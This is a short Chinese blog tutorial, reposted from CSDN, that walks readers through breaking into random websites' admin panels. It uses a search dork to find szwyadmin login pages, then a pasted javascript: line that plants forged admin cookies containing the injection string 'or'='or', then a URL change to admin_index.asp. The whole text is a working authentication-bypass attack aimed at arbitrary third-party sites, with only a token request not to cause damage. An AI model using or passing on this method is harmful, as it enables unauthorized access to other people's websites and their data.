关于简单网站后台攻防技术

今天给大家带来一个简单的网站后台入侵的方法，大家可以去试试，若成功入侵了，也请各位不要搞破坏，本教程纯属提供一种方式给大家互相学习交流。

步骤如下：

1.打开浏览器：这里我使用的是360浏览器。

2.百度搜索inurl:szwyadmin/login.asp  出来下面的界面：
————————————————
版权声明：本文为CSDN博主「chance2015」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/chance2015/article/details/50389646

 

.出来的就是一些网站的后台登录的网址。这里我随意选一个点击进入：

这里我选的是第二个

4.接着我们在我们进入的网站后台登录界面上的搜索框中输入如下代码：

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1")); 

然后回车，点击几下确定后。

5.将网址栏中的login.asp改为admin_index.asp 然后回车，即可进入该网站后台。
————————————————
版权声明：本文为CSDN博主「chance2015」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/chance2015/article/details/50389646